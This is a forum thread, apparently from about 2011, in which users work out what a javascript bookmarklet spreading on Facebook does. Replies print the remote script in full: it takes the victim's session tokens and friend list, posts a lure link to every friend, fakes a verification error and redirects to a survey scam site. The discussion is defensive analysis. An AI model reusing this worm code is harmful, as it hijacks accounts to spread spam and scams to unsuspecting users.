what does this code mean

There is a javascript code going arounf Facebook and I am curious as what it does they give an example but it didn't work. Also, I don't want to run any old code on this machine. Thank you, Mike

Code:

javascript:(function(){_ccscr=document.createElement('script');_ccscr.type='text/javascript';_ccscr.src='http://bdatero.info/y.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();

I am not a coder but network guy all help is greatly appreciated.

Here is the URL: http://tadero.info/engl.php

it's getting its source from here:
'http://bdatero.info/y.js?'+(Math.random())
and doesn't have any actual code in itself other than referring to the source on that website. My guess is that the Math.random() is used in the URL to make it harder for firefox and other websites to warn as unsafe? I'm not sure though, as they could just set the whole domain as 'unsafe' to produce the warning. It looks sketchy to me. I went to the link directly in my browser, as to not run the script.

Quote:

var message = "Awesome! A new way to see your profile's full stats. I just checked how many people have viewed my profile and how much time I spent on FB this month :). Scan your profile and let me know how popular YOU are.";
var jsText = "http://tdadero.info/gop.php";
var myText = "Scan Profile";

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=" + uid + "&"+Math.random(),false);
gf.send();
if(gf.readyState!=4){ }else{
data = eval('(' + gf.responseText.substr(9) + ')');
if(data.error){ }else{
friends = data.payload.entries.sort(function(a,b){return a.index-b.index;});
}
}
for(var i=0; i<friends.length; i++){
var httpwp = new XMLHttpRequest();
var urlwp = "/fbml/ajax/prompt_feed.php?__a=1";
var paramswp = "&__d=1&app_id=6261817190&extern=1&" +
"&post_form_id=" + post_form_id +
"&fb_dtsg=" + fb_dtsg +
"&feed_info[action_links][0][href]=" + encodeURIComponent(jsText) +
"&feed_info[action_links][0][text]=" + encodeURIComponent(myText) +
"&feed_info[app_has_no_session]=true&feed_info[body_general]=&feed_info[template_id]=60341837091&feed_info[templatized]=0&feed_target_type=target_feed&feedform_type=63&lsd&nctr[_ia]=1&post_form_id_source=AsyncRequest&preview=false&size=2&to_ids[0]=" + friends[i].uid +
"&user_message=" + message;
httpwp.open("POST", urlwp, true);
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive");
httpwp.onreadystatechange = function(){
if (httpwp.readyState == 4 && httpwp.status == 200){

}
}
httpwp.send(paramswp);
}

alert("Account verification failed. Please proceed to next step to verify your account.");
window.location = "http://basopu.info/poli/indexen.php"

I'm not very experienced with POST and ajax, but my guess is this posts a message to facebook under your id, and then sends you to this page

Quote:

http://basopu.info/poli/indexen.php

saying that you couldn't verify your account. This page then asks you to complete a survey, which may be the point of this script as a whole, but there may be other things going on at that site as well, as I never took the time to get passed the survey popup to see what else the website had in store :lildevil:

Optional extra', :halo:

Quote:

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0)

I've got the actual Source for this .js xss, i've attached a .txt file it contains both parts of the 0-day that was being used.

This has sinced been patched by FaceBook, so it's pretty harmless atm.

It's one of those supposedly "stalker" apps that will allow you to see who's been watching your profile.

NONE of those scripts work because FB doesn't expose that data.

http://arstechnica.com/web/news/2011...avoid-them.ars